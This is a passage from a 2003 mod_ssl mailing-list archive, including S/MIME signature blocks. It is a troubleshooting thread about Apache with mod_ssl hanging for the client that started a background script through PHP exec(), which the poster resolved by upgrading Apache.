RKMCOXfkqs9CGNt5pm3ukYab4eVLeAHO14Ym73Q7gsMOXd+0EdTVH2iryc9VJB+wrfNruLE8
NCCca3Ef/SWnyYyzQBRAI7CiInUUsC41+P55vi1u5MH5WFYGAwOXCNPeS5Rm+tV3FiO67Azy
bNtX9qOUpIFTeLSzpC27SqyFUeJSRRU2zwjRVaJ6ASUzOSF4dGj0Re1vFMNdcfeYtvLdSYZo
4/Mg6pNQnqHzldbkWc8pP1RUzRr27e3iT3t9sks0HQOhujJINur00pPk2elURPefIjCCBFQw
ggM8oAMCAQICAgCvMA0GCSqGSIb3DQEBBAUAMFQxCzAJBgNVBAYTAkZSMQwwCgYDVQQKEwND
UlUxFzAVBgNVBAMTDmFjLXV0aWxpc2F0ZXVyMR4wHAYJKoZIhvcNAQkBFg9jYS1hZG1pbkBj
cnUuZnIwHhcNMDMwODA0MDkwNjUxWhcNMDQwMjA0MDkwNjUxWjB2MQswCQYDVQQGEwJGUjEm
MCQGA1UEChMdQ29taXRlIFJlc2VhdSBkZXMgVW5pdmVyc2l0ZXMxGDAWBgNVBAMTD1ZpbmNl
bnQgS2VyYXZlYzElMCMGCSqGSIb3DQEJARYWdmluY2VudC5rZXJhdmVjQGNydS5mcjCBnzAN
BgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAnODMmFGx0rsI52Zan+lR50bJeBK1ca5CpU/13RuJ
DgQGeCIOFK3as1g0qNpiDfracDLe0bFcjEtVoDOJKfMRLfmkAhozhf4UnkXptwAGG114TcxI
YpadM8ST2l7qI4faViLAfNbHdTGUIrqdfksiHXzaQqYjkmjGWoniNv3fcfsCAwEAAaOCAZAw
ggGMMAwGA1UdEwEB/wQCMAAwEQYJYIZIAYb4QgEBBAQDAgSwMA4GA1UdDwEB/wQEAwIF4DBw
BglghkgBhvhCAQ0EYxZhQ2VydGlmaWNhdCBhYy11dGlsaXNhdGV1ci4gUG91ciB0b3V0ZSBp
bmZvcm1hdGlvbiBzZSByZXBvcnRlciDgIGh0dHA6Ly9pZ2MuY3J1LmZyL2FjLXV0aWxpc2F0
ZXVyLzAdBgNVHQ4EFgQUWznwo2TLbwDuCUS6fvkyaGTAI3QwdwYDVR0jBHAwboAUFQp8KLWs
przX/TIzHXm9s0kKMZChU6RRME8xCzAJBgNVBAYTAkZSMQwwCgYDVQQKEwNDUlUxEjAQBgNV
BAMTCWFjLXJhY2luZTEeMBwGCSqGSIb3DQEJARYPY2EtYWRtaW5AY3J1LmZyggECME8GA1Ud
HwRIMEYwRKBCoECGPmh0dHA6Ly9pZ2MuY3J1LmZyL2NnaS1iaW4vbG9hZGNybD9DQT1hYy11
dGlsaXNhdGV1ciZmb3JtYXQ9REVSMA0GCSqGSIb3DQEBBAUAA4IBAQCAyX3W80JL81gZZxx4
3djkdwI9nyrNH49bC6USYult0DJkN/WJg/waZB8P9I1EowI5d+Sqz0IY23mmbe6Rhpvh5Ut4
Ac7XhibvdDuCww5d37QR1NUfaKvJz1UkH7Ct82u4sTw0IJxrcR/9JafJjLNAFEAjsKIidRSw
LjX4/nm+LW7kwflYVgYDA5cI095LlGb61XcWI7rsDPJs21f2o5SkgVN4tLOkLbtKrIVR4lJF
FTbPCNFVonoBJTM5IXh0aPRF7W8Uw11x95i28t1Jhmjj8yDqk1CeofOV1uRZzyk/VFTNGvbt
7eJPe32ySzQdA6G6Mkg26vTSk+TZ6VRE958iMYICjTCCAokCAQEwWjBUMQswCQYDVQQGEwJG
UjEMMAoGA1UEChMDQ1JVMRcwFQYDVQQDEw5hYy11dGlsaXNhdGV1cjEeMBwGCSqGSIb3DQEJ
ARYPY2EtYWRtaW5AY3J1LmZyAgIArzAJBgUrDgMCGgUAoIIBiTAYBgkqhkiG9w0BCQMxCwYJ
KoZIhvcNAQcBMBwGCSqGSIb3DQEJBTEPFw0wMzA5MDExNTMyMTFaMCMGCSqGSIb3DQEJBDEW
BBRCgdGvD3FBgHnC9V+gKhWNu2m0jzBSBgkqhkiG9w0BCQ8xRTBDMAoGCCqGSIb3DQMHMA4G
CCqGSIb3DQMCAgIAgDANBggqhkiG9w0DAgIBQDAHBgUrDgMCBzANBggqhkiG9w0DAgIBKDBp
BgkrBgEEAYI3EAQxXDBaMFQxCzAJBgNVBAYTAkZSMQwwCgYDVQQKEwNDUlUxFzAVBgNVBAMT
DmFjLXV0aWxpc2F0ZXVyMR4wHAYJKoZIhvcNAQkBFg9jYS1hZG1pbkBjcnUuZnICAgCvMGsG
CyqGSIb3DQEJEAILMVygWjBUMQswCQYDVQQGEwJGUjEMMAoGA1UEChMDQ1JVMRcwFQYDVQQD
Ew5hYy11dGlsaXNhdGV1cjEeMBwGCSqGSIb3DQEJARYPY2EtYWRtaW5AY3J1LmZyAgIArzAN
BgkqhkiG9w0BAQEFAASBgEXfaRwHxxScAO1Wb3owmAzUmZZLVG1Gvo9mnKWpkoGfVjZBfYxJ
Yk906W6ThgXa2QtwIkU9FVzXIZPBA5jzAaORRjmGtvcE0Qs9/kiNwZsPC88i8ctoT2EkWsVe
KnDI0IrQGUQWdoYHdbx1jz2QYhIX3rlGrIRAxl43xtlXxIXoAAAAAAAA
--------------ms000004070001050408090401--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep  1 17:40:25 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C785BA8962; Mon,  1 Sep 2003 17:40:25 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from wink.pobox.com (wink.pobox.com [207.106.49.21])
	by master.modssl.org (Postfix) with ESMTP id 3E6FCA8944
	for ; Mon,  1 Sep 2003 17:40:24 +0200 (CEST)
Received: from texas.pobox.com (texas.pobox.com[64.49.223.111])
	by wink.pobox.com (Postfix) with ESMTP id C2D72128CD
	for ; Mon,  1 Sep 2003 11:40:22 -0400 (EDT)
Received: from yourpa86z1i3g7 (unknown [209.210.104.210])
	by texas.pobox.com (Postfix) with ESMTP id CA0C745356
	for ; Mon,  1 Sep 2003 11:40:21 -0400 (EDT)
From: "Dave Paris" 
To: 
Subject: RE: Modssl wait background script to finish
Date: Mon, 1 Sep 2003 11:40:25 -0400
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
Importance: Normal
In-Reply-To: <3F53667B.2090803@cru.fr>
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Dave Paris" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

A couple questions.  Is this something like a SSL-protected web interface to
an IMAP server (ref: your mention of port 143)?  If so, are you accepting
certain directives which are being passed on to the IMAP server (ref: "start
the script on port 143")?  If this is the case, it sounds like what you're
intending to do is start a "fire and forget" script .. not being concerned
about the return value from the script.  If that's the case, you may want to
look at creating a IPC process of some sort that can be left to fend for
itself after being started, allowing a response to get back to the user.

Is this an accurate assessment of what you're trying to do?

-dsp

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of Vincent KERAVEC
Sent: Monday, September 01, 2003 11:32 AM
To: modssl-users@modssl.org
Subject: Modssl wait background script to finish


Hello,
I've got a problem with modssl. When I run a script in background, the
server doesn't respond to the browser who start the script on port 143
until the script finish. The server continue to reply to all other browser.

I'm running Apache/2.0.40 (Red Hat Linux) with mod_ssl/2.0.40 and
OpenSSL/0.9.7a. I'm also using client side authentication.

Is there something to change in the ssl configuration to allow
background process ?

Thanks,
Vincent KERAVEC

ps : When i put modssl in loglevel debug the server seems to wait after
this message :
    [Wed Aug 27 15:10:30 2003] [debug]
/usr/src/build/250859-i386/BUILD/httpd-2.0.40/modules/ssl/ssl_engine_io.c(10
05):


+-------------------------------------------------------------------------+
[Wed Aug 27 15:10:30 2003] [info] Initial (No.1) HTTPS request received
for child 0 (server ***.****.***:443)



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep  1 17:59:51 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 514A2A8947; Mon,  1 Sep 2003 17:59:51 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from listes.cru.fr (listes.cru.fr [195.220.94.165])
	by master.modssl.org (Postfix) with ESMTP id 4C9BBA8940
	for ; Mon,  1 Sep 2003 17:59:50 +0200 (CEST)
Received: from cru.fr (vk.cru.fr [195.220.94.94])
	by listes.cru.fr (8.12.9/8.12.9/8.12-CW) with ESMTP id h81FxnbM028207
	for ; Mon, 1 Sep 2003 17:59:49 +0200
Message-ID: <3F536CB3.5060806@cru.fr>
Date: Mon, 01 Sep 2003 17:58:43 +0200
From: Vincent KERAVEC 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20030225
X-Accept-Language: fr-fr, fr, en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Modssl wait background script to finish
References: 
In-Reply-To: 
Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="------------ms040806030405080800030003"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Vincent KERAVEC 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a cryptographically signed message in MIME format.

--------------ms040806030405080800030003
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit

Thanks for your response,
Sorry I mean 443 and not 143  :(

I just want to run a bash script on the server.
I launch the script whith :
 /dev/null &");
?>

The page load successfully but when I follow a link the server didn't 
respond.
If I use an other navigator the server respond normally.

Vincent KERAVEC

Dave Paris wrote:

>A couple questions.  Is this something like a SSL-protected web interface to
>an IMAP server (ref: your mention of port 143)?  If so, are you accepting
>certain directives which are being passed on to the IMAP server (ref: "start
>the script on port 143")?  If this is the case, it sounds like what you're
>intending to do is start a "fire and forget" script .. not being concerned
>about the return value from the script.  If that's the case, you may want to
>look at creating a IPC process of some sort that can be left to fend for
>itself after being started, allowing a response to get back to the user.
>
>Is this an accurate assessment of what you're trying to do?
>
>-dsp
>
>-----Original Message-----
>From: owner-modssl-users@modssl.org
>[mailto:owner-modssl-users@modssl.org]On Behalf Of Vincent KERAVEC
>Sent: Monday, September 01, 2003 11:32 AM
>To: modssl-users@modssl.org
>Subject: Modssl wait background script to finish
>
>
>Hello,
>I've got a problem with modssl. When I run a script in background, the
>server doesn't respond to the browser who start the script on port 143
>until the script finish. The server continue to reply to all other browser.
>
>I'm running Apache/2.0.40 (Red Hat Linux) with mod_ssl/2.0.40 and
>OpenSSL/0.9.7a. I'm also using client side authentication.
>
>Is there something to change in the ssl configuration to allow
>background process ?
>
>Thanks,
>Vincent KERAVEC
>
>ps : When i put modssl in loglevel debug the server seems to wait after
>this message :
>    [Wed Aug 27 15:10:30 2003] [debug]
>/usr/src/build/250859-i386/BUILD/httpd-2.0.40/modules/ssl/ssl_engine_io.c(10
>05):
>
>
>+-------------------------------------------------------------------------+
>[Wed Aug 27 15:10:30 2003] [info] Initial (No.1) HTTPS request received
>for child 0 (server ***.****.***:443)
>
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>  
>

--------------ms040806030405080800030003
Content-Type: application/x-pkcs7-signature; name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="smime.p7s"
Content-Description: S/MIME Cryptographic Signature

MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIMjzCC
A9swggLDoAMCAQICAQIwDQYJKoZIhvcNAQEEBQAwTzELMAkGA1UEBhMCRlIxDDAKBgNVBAoT
A0NSVTESMBAGA1UEAxMJYWMtcmFjaW5lMR4wHAYJKoZIhvcNAQkBFg9jYS1hZG1pbkBjcnUu
ZnIwHhcNMDMwNTE2MDkzMTE3WhcNMTIxMjE0MDkzMTE3WjBUMQswCQYDVQQGEwJGUjEMMAoG
A1UEChMDQ1JVMRcwFQYDVQQDEw5hYy11dGlsaXNhdGV1cjEeMBwGCSqGSIb3DQEJARYPY2Et
YWRtaW5AY3J1LmZyMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAtXGYMirQ2feu
6b4FDrH8PRwIyjfXPSXaG33GoatYJIbOmxAwnGbwVBng3WDzoW5X45RWq93nOxSdx4MTsGQJ
pBihob2h4XeGpL54WlLd+kvOxvp/0OzLYYcESI3dpVRjf6jB8Ggc7BUlE+ptIjyXAVTNKz1o
6aiLSR6G1zG5cidq3BAXjlpfvbX9EWfICcnmLMSQ29oam857EsAJRuGHNajdPEMUlsioEIf2
Zf4YL9pa5rJ5Efs7NTxu8ffICGYlCynJXJTC461sRrub8s6SOM69NTw8EM+1A3ewd5WyGkZe
QSG7SJyJY8Lg8u4CMoflOjP3LSYhCLI1Ic0gX08dkQIDAQABo4G8MIG5MA8GA1UdEwEB/wQF
MAMBAf8wHQYDVR0OBBYEFBUKfCi1rKa81/0yMx15vbNJCjGQMHcGA1UdIwRwMG6AFK8vz0qV
BLbeJLMJqVU+XA4c+HEuoVOkUTBPMQswCQYDVQQGEwJGUjEMMAoGA1UEChMDQ1JVMRIwEAYD
VQQDEwlhYy1yYWNpbmUxHjAcBgkqhkiG9w0BCQEWD2NhLWFkbWluQGNydS5mcoIBADAOBgNV
HQ8BAf8EBAMCAQYwDQYJKoZIhvcNAQEEBQADggEBAMG/+LofN2vISFWieXrHsFsIrM/2WUhf
zAcE2/Ga+/UWvJaDJO9RlbUNN3l+f40L1yUJW9kZqY4XMBcbJ6jbpmeJ+zTf+zveAD/sl9ZN
qoC931HFLq/TGjZSIQxX4Nxad9DFbok66X1qfRZF4+beaz2zjrF07LvjWX6201Rc6zQhNyTy
UdO/wYY0EBYu0CFrTK4RxS6d2LsyO1p1Xj7oMCa9Utmu/igZoXJYL709POBKHJoYNU+LI6iJ
8aYcZupJ/GXVxfj68L1KP2i8cM3a570bJCDbsKcchzZqsvII5cewU7KKPH4fyMyfsA39tJ0V
BMQyvdWZHpS75DN0eB5UVzUwggRUMIIDPKADAgECAgIArzANBgkqhkiG9w0BAQQFADBUMQsw
CQYDVQQGEwJGUjEMMAoGA1UEChMDQ1JVMRcwFQYDVQQDEw5hYy11dGlsaXNhdGV1cjEeMBwG
CSqGSIb3DQEJARYPY2EtYWRtaW5AY3J1LmZyMB4XDTAzMDgwNDA5MDY1MVoXDTA0MDIwNDA5
MDY1MVowdjELMAkGA1UEBhMCRlIxJjAkBgNVBAoTHUNvbWl0ZSBSZXNlYXUgZGVzIFVuaXZl
cnNpdGVzMRgwFgYDVQQDEw9WaW5jZW50IEtlcmF2ZWMxJTAjBgkqhkiG9w0BCQEWFnZpbmNl
bnQua2VyYXZlY0BjcnUuZnIwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJzgzJhRsdK7
COdmWp/pUedGyXgStXGuQqVP9d0biQ4EBngiDhSt2rNYNKjaYg362nAy3tGxXIxLVaAziSnz
ES35pAIaM4X+FJ5F6bcABhtdeE3MSGKWnTPEk9pe6iOH2lYiwHzWx3UxlCK6nX5LIh182kKm
I5JoxlqJ4jb933H7AgMBAAGjggGQMIIBjDAMBgNVHRMBAf8EAjAAMBEGCWCGSAGG+EIBAQQE
AwIEsDAOBgNVHQ8BAf8EBAMCBeAwcAYJYIZIAYb4QgENBGMWYUNlcnRpZmljYXQgYWMtdXRp
bGlzYXRldXIuIFBvdXIgdG91dGUgaW5mb3JtYXRpb24gc2UgcmVwb3J0ZXIg4CBodHRwOi8v
aWdjLmNydS5mci9hYy11dGlsaXNhdGV1ci8wHQYDVR0OBBYEFFs58KNky28A7glEun75Mmhk
wCN0MHcGA1UdIwRwMG6AFBUKfCi1rKa81/0yMx15vbNJCjGQoVOkUTBPMQswCQYDVQQGEwJG
UjEMMAoGA1UEChMDQ1JVMRIwEAYDVQQDEwlhYy1yYWNpbmUxHjAcBgkqhkiG9w0BCQEWD2Nh
LWFkbWluQGNydS5mcoIBAjBPBgNVHR8ESDBGMESgQqBAhj5odHRwOi8vaWdjLmNydS5mci9j
Z2ktYmluL2xvYWRjcmw/Q0E9YWMtdXRpbGlzYXRldXImZm9ybWF0PURFUjANBgkqhkiG9w0B
AQQFAAOCAQEAgMl91vNCS/NYGWcceN3Y5HcCPZ8qzR+PWwulEmLpbdAyZDf1iYP8GmQfD/SN
RKMCOXfkqs9CGNt5pm3ukYab4eVLeAHO14Ym73Q7gsMOXd+0EdTVH2iryc9VJB+wrfNruLE8
NCCca3Ef/SWnyYyzQBRAI7CiInUUsC41+P55vi1u5MH5WFYGAwOXCNPeS5Rm+tV3FiO67Azy
bNtX9qOUpIFTeLSzpC27SqyFUeJSRRU2zwjRVaJ6ASUzOSF4dGj0Re1vFMNdcfeYtvLdSYZo
4/Mg6pNQnqHzldbkWc8pP1RUzRr27e3iT3t9sks0HQOhujJINur00pPk2elURPefIjCCBFQw
ggM8oAMCAQICAgCvMA0GCSqGSIb3DQEBBAUAMFQxCzAJBgNVBAYTAkZSMQwwCgYDVQQKEwND
UlUxFzAVBgNVBAMTDmFjLXV0aWxpc2F0ZXVyMR4wHAYJKoZIhvcNAQkBFg9jYS1hZG1pbkBj
cnUuZnIwHhcNMDMwODA0MDkwNjUxWhcNMDQwMjA0MDkwNjUxWjB2MQswCQYDVQQGEwJGUjEm
MCQGA1UEChMdQ29taXRlIFJlc2VhdSBkZXMgVW5pdmVyc2l0ZXMxGDAWBgNVBAMTD1ZpbmNl
bnQgS2VyYXZlYzElMCMGCSqGSIb3DQEJARYWdmluY2VudC5rZXJhdmVjQGNydS5mcjCBnzAN
BgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAnODMmFGx0rsI52Zan+lR50bJeBK1ca5CpU/13RuJ
DgQGeCIOFK3as1g0qNpiDfracDLe0bFcjEtVoDOJKfMRLfmkAhozhf4UnkXptwAGG114TcxI
YpadM8ST2l7qI4faViLAfNbHdTGUIrqdfksiHXzaQqYjkmjGWoniNv3fcfsCAwEAAaOCAZAw
ggGMMAwGA1UdEwEB/wQCMAAwEQYJYIZIAYb4QgEBBAQDAgSwMA4GA1UdDwEB/wQEAwIF4DBw
BglghkgBhvhCAQ0EYxZhQ2VydGlmaWNhdCBhYy11dGlsaXNhdGV1ci4gUG91ciB0b3V0ZSBp
bmZvcm1hdGlvbiBzZSByZXBvcnRlciDgIGh0dHA6Ly9pZ2MuY3J1LmZyL2FjLXV0aWxpc2F0
ZXVyLzAdBgNVHQ4EFgQUWznwo2TLbwDuCUS6fvkyaGTAI3QwdwYDVR0jBHAwboAUFQp8KLWs
przX/TIzHXm9s0kKMZChU6RRME8xCzAJBgNVBAYTAkZSMQwwCgYDVQQKEwNDUlUxEjAQBgNV
BAMTCWFjLXJhY2luZTEeMBwGCSqGSIb3DQEJARYPY2EtYWRtaW5AY3J1LmZyggECME8GA1Ud
HwRIMEYwRKBCoECGPmh0dHA6Ly9pZ2MuY3J1LmZyL2NnaS1iaW4vbG9hZGNybD9DQT1hYy11
dGlsaXNhdGV1ciZmb3JtYXQ9REVSMA0GCSqGSIb3DQEBBAUAA4IBAQCAyX3W80JL81gZZxx4
3djkdwI9nyrNH49bC6USYult0DJkN/WJg/waZB8P9I1EowI5d+Sqz0IY23mmbe6Rhpvh5Ut4
Ac7XhibvdDuCww5d37QR1NUfaKvJz1UkH7Ct82u4sTw0IJxrcR/9JafJjLNAFEAjsKIidRSw
LjX4/nm+LW7kwflYVgYDA5cI095LlGb61XcWI7rsDPJs21f2o5SkgVN4tLOkLbtKrIVR4lJF
FTbPCNFVonoBJTM5IXh0aPRF7W8Uw11x95i28t1Jhmjj8yDqk1CeofOV1uRZzyk/VFTNGvbt
7eJPe32ySzQdA6G6Mkg26vTSk+TZ6VRE958iMYICjTCCAokCAQEwWjBUMQswCQYDVQQGEwJG
UjEMMAoGA1UEChMDQ1JVMRcwFQYDVQQDEw5hYy11dGlsaXNhdGV1cjEeMBwGCSqGSIb3DQEJ
ARYPY2EtYWRtaW5AY3J1LmZyAgIArzAJBgUrDgMCGgUAoIIBiTAYBgkqhkiG9w0BCQMxCwYJ
KoZIhvcNAQcBMBwGCSqGSIb3DQEJBTEPFw0wMzA5MDExNTU4NDNaMCMGCSqGSIb3DQEJBDEW
BBRw4zkhabTXckOVVTR7n2imMEUhUzBSBgkqhkiG9w0BCQ8xRTBDMAoGCCqGSIb3DQMHMA4G
CCqGSIb3DQMCAgIAgDANBggqhkiG9w0DAgIBQDAHBgUrDgMCBzANBggqhkiG9w0DAgIBKDBp
BgkrBgEEAYI3EAQxXDBaMFQxCzAJBgNVBAYTAkZSMQwwCgYDVQQKEwNDUlUxFzAVBgNVBAMT
DmFjLXV0aWxpc2F0ZXVyMR4wHAYJKoZIhvcNAQkBFg9jYS1hZG1pbkBjcnUuZnICAgCvMGsG
CyqGSIb3DQEJEAILMVygWjBUMQswCQYDVQQGEwJGUjEMMAoGA1UEChMDQ1JVMRcwFQYDVQQD
Ew5hYy11dGlsaXNhdGV1cjEeMBwGCSqGSIb3DQEJARYPY2EtYWRtaW5AY3J1LmZyAgIArzAN
BgkqhkiG9w0BAQEFAASBgAh0L74nhr23Xw7hTxI9JE/KCHfDIyMTvw8SJ0Pnl7GStcBBhPHw
5qKrMBoHxa/i37VfsrkJUy2kBF5YLR84N9xMNpZyVa9d5y4ZWTv4d6WYdiL3lDXDKjbnt+dr
ej1dFnogydBJaD7gSh5GehrWEZ49EnO+18UAOERe7m5w9gz4AAAAAAAA
--------------ms040806030405080800030003--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep  1 18:10:34 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 9A537A8947; Mon,  1 Sep 2003 18:10:34 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from wink.pobox.com (wink.pobox.com [207.106.49.21])
	by master.modssl.org (Postfix) with ESMTP id 1104CA8940
	for ; Mon,  1 Sep 2003 18:10:33 +0200 (CEST)
Received: from texas.pobox.com (texas.pobox.com[64.49.223.111])
	by wink.pobox.com (Postfix) with ESMTP id 542C3110E5
	for ; Mon,  1 Sep 2003 12:10:31 -0400 (EDT)
Received: from yourpa86z1i3g7 (unknown [209.210.104.210])
	by texas.pobox.com (Postfix) with ESMTP id 65CC04541B
	for ; Mon,  1 Sep 2003 12:10:30 -0400 (EDT)
From: "Dave Paris" 
To: 
Subject: RE: Modssl wait background script to finish
Date: Mon, 1 Sep 2003 12:10:33 -0400
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
Importance: Normal
In-Reply-To: <3F536CB3.5060806@cru.fr>
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Dave Paris" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Someone with more PHP experience than I will need to address the use of
exec() in the context of PHP, but were this Perl then exec() would stop the
running Perl process after launching the external process - which would have
the effect of stopping your running Perl script.

Whether PHP operates similarly, I'm not sure (I don't do anything with
PHP).. however this might be something to look into since (as I understand
it) many of PHP's internals were borrowed from Perl originally.  If this was
Perl, you'd want either system(), open2(), open3(), or backticks.

Good luck!
-dsp

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of Vincent KERAVEC
Sent: Monday, September 01, 2003 11:59 AM
To: modssl-users@modssl.org
Subject: Re: Modssl wait background script to finish


Thanks for your response,
Sorry I mean 443 and not 143  :(

I just want to run a bash script on the server.
I launch the script whith :
 /dev/null &");
?>

The page load successfully but when I follow a link the server didn't
respond.
If I use an other navigator the server respond normally.

Vincent KERAVEC

Dave Paris wrote:

>A couple questions.  Is this something like a SSL-protected web interface
to
>an IMAP server (ref: your mention of port 143)?  If so, are you accepting
>certain directives which are being passed on to the IMAP server (ref:
"start
>the script on port 143")?  If this is the case, it sounds like what you're
>intending to do is start a "fire and forget" script .. not being concerned
>about the return value from the script.  If that's the case, you may want
to
>look at creating a IPC process of some sort that can be left to fend for
>itself after being started, allowing a response to get back to the user.
>
>Is this an accurate assessment of what you're trying to do?
>
>-dsp
>
>-----Original Message-----
>From: owner-modssl-users@modssl.org
>[mailto:owner-modssl-users@modssl.org]On Behalf Of Vincent KERAVEC
>Sent: Monday, September 01, 2003 11:32 AM
>To: modssl-users@modssl.org
>Subject: Modssl wait background script to finish
>
>
>Hello,
>I've got a problem with modssl. When I run a script in background, the
>server doesn't respond to the browser who start the script on port 143
>until the script finish. The server continue to reply to all other browser.
>
>I'm running Apache/2.0.40 (Red Hat Linux) with mod_ssl/2.0.40 and
>OpenSSL/0.9.7a. I'm also using client side authentication.
>
>Is there something to change in the ssl configuration to allow
>background process ?
>
>Thanks,
>Vincent KERAVEC
>
>ps : When i put modssl in loglevel debug the server seems to wait after
>this message :
>    [Wed Aug 27 15:10:30 2003] [debug]
>/usr/src/build/250859-i386/BUILD/httpd-2.0.40/modules/ssl/ssl_engine_io.c(1
0
>05):
>
>
>+-------------------------------------------------------------------------+
>[Wed Aug 27 15:10:30 2003] [info] Initial (No.1) HTTPS request received
>for child 0 (server ***.****.***:443)
>
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep  4 10:56:24 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 16EB8A8941; Thu,  4 Sep 2003 10:56:24 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from listes.cru.fr (listes.cru.fr [195.220.94.165])
	by master.modssl.org (Postfix) with ESMTP id 77C9DA8935
	for ; Thu,  4 Sep 2003 10:56:22 +0200 (CEST)
Received: from cru.fr (vk.cru.fr [195.220.94.94])
	by listes.cru.fr (8.12.9/8.12.9/8.12-CW) with ESMTP id h848uLlv019358
	for ; Thu, 4 Sep 2003 10:56:21 +0200
Message-ID: <3F56FDEA.6030303@cru.fr>
Date: Thu, 04 Sep 2003 10:55:06 +0200
From: Vincent KERAVEC 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20030225
X-Accept-Language: fr-fr, fr, en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Modssl wait background script to finish
References: 
In-Reply-To: 
Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="------------ms040509010102040205000205"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Vincent KERAVEC 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a cryptographically signed message in MIME format.

--------------ms040509010102040205000205
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

I solve the problem by upgrading apache version to 2.0.47.

Vincent KERAVEC

Dave Paris wrote:

>Someone with more PHP experience than I will need to address the use of
>exec() in the context of PHP, but were this Perl then exec() would stop the
>running Perl process after launching the external process - which would have
>the effect of stopping your running Perl script.
>
>Whether PHP operates similarly, I'm not sure (I don't do anything with
>PHP).. however this might be something to look into since (as I understand
>it) many of PHP's internals were borrowed from Perl originally.  If this was
>Perl, you'd want either system(), open2(), open3(), or backticks.
>
>Good luck!
>-dsp
>
>-----Original Message-----
>From: owner-modssl-users@modssl.org
>[mailto:owner-modssl-users@modssl.org]On Behalf Of Vincent KERAVEC
>Sent: Monday, September 01, 2003 11:59 AM
>To: modssl-users@modssl.org
>Subject: Re: Modssl wait background script to finish
>
>
>Thanks for your response,
>Sorry I mean 443 and not 143  :(
>
>I just want to run a bash script on the server.
>I launch the script whith :
>    exec ("nohup ./script.sh > /dev/null &");
>?>
>
>The page load successfully but when I follow a link the server didn't
>respond.
>If I use an other navigator the server respond normally.
>
>Vincent KERAVEC
>
>Dave Paris wrote:
>
>  
>
>>A couple questions.  Is this something like a SSL-protected web interface
>>    
>>
>to
>  
>
>>an IMAP server (ref: your mention of port 143)?  If so, are you accepting
